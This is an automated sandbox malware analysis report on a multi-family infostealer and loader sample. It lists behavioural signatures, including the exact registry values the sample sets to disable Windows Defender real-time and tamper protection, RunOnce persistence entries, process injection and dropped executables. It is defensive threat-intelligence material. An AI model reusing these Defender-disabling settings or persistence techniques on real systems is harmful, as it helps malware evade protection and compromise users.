Malware Analysis Report

2025-08-05 16:13

Sample ID 231026-g9lkxseb49
Target 43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4
SHA256 43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4

Threat Level: Known bad

The file 43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan

ZGRat

Detect ZGRat V1

DcRat

RedLine

RedLine payload

Modifies Windows Defender Real-time Protection settings

SmokeLoader

Amadey

Raccoon Stealer payload

Glupteba

Raccoon

Glupteba payload

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Windows security modification

Executes dropped EXE

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-26 06:30

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-26 06:30

Reported

2023-10-26 06:32

Platform

win10v2004-20231023-en

Max time kernel

32s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\D508.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB43.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB43.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\CDCF.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3688 set thread context of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\DB43.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3324 wrote to memory of 1972 N/A N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe
PID 3324 wrote to memory of 1972 N/A N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe
PID 3324 wrote to memory of 1972 N/A N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe
PID 3324 wrote to memory of 1220 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF57.exe
PID 3324 wrote to memory of 1220 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF57.exe
PID 3324 wrote to memory of 1220 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF57.exe
PID 1972 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe
PID 1972 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe
PID 1972 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe
PID 3324 wrote to memory of 4236 N/A N/A C:\Windows\system32\cmd.exe
PID 3324 wrote to memory of 4236 N/A N/A C:\Windows\system32\cmd.exe
PID 956 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe
PID 956 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe
PID 956 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe
PID 2100 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe
PID 2100 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe
PID 2100 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe
PID 3324 wrote to memory of 4104 N/A N/A C:\Users\Admin\AppData\Local\Temp\D15D.exe
PID 3324 wrote to memory of 4104 N/A N/A C:\Users\Admin\AppData\Local\Temp\D15D.exe
PID 3324 wrote to memory of 4104 N/A N/A C:\Users\Admin\AppData\Local\Temp\D15D.exe
PID 3324 wrote to memory of 3644 N/A N/A C:\Users\Admin\AppData\Local\Temp\D229.exe
PID 3324 wrote to memory of 3644 N/A N/A C:\Users\Admin\AppData\Local\Temp\D229.exe
PID 3324 wrote to memory of 3644 N/A N/A C:\Users\Admin\AppData\Local\Temp\D229.exe
PID 4444 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe
PID 4444 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe
PID 4444 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe
PID 2200 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe
PID 2200 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe
PID 2200 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe
PID 3324 wrote to memory of 2196 N/A N/A C:\Users\Admin\AppData\Local\Temp\D508.exe
PID 3324 wrote to memory of 2196 N/A N/A C:\Users\Admin\AppData\Local\Temp\D508.exe
PID 3324 wrote to memory of 2196 N/A N/A C:\Users\Admin\AppData\Local\Temp\D508.exe
PID 4236 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4236 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3324 wrote to memory of 4068 N/A N/A C:\Users\Admin\AppData\Local\Temp\DB43.exe
PID 3324 wrote to memory of 4068 N/A N/A C:\Users\Admin\AppData\Local\Temp\DB43.exe
PID 3324 wrote to memory of 4068 N/A N/A C:\Users\Admin\AppData\Local\Temp\DB43.exe
PID 4880 wrote to memory of 2672 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 2672 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4236 wrote to memory of 4972 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4236 wrote to memory of 4972 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2196 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\D508.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2196 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\D508.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2196 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\D508.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4972 wrote to memory of 1048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 1048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 452 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\system32\BackgroundTaskHost.exe
PID 452 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\system32\BackgroundTaskHost.exe
PID 452 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\system32\BackgroundTaskHost.exe
PID 452 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 452 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 452 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe

"C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\CDCF.exe

C:\Users\Admin\AppData\Local\Temp\CDCF.exe

C:\Users\Admin\AppData\Local\Temp\CF57.exe

C:\Users\Admin\AppData\Local\Temp\CF57.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D052.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe

C:\Users\Admin\AppData\Local\Temp\D15D.exe

C:\Users\Admin\AppData\Local\Temp\D15D.exe

C:\Users\Admin\AppData\Local\Temp\D229.exe

C:\Users\Admin\AppData\Local\Temp\D229.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe

C:\Users\Admin\AppData\Local\Temp\D508.exe

C:\Users\Admin\AppData\Local\Temp\D508.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\DB43.exe

C:\Users\Admin\AppData\Local\Temp\DB43.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa96e146f8,0x7ffa96e14708,0x7ffa96e14718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

